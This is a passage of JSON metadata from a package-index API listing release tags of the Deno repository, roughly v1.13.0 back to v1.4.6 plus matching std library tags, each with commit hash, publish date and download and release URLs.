ositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositori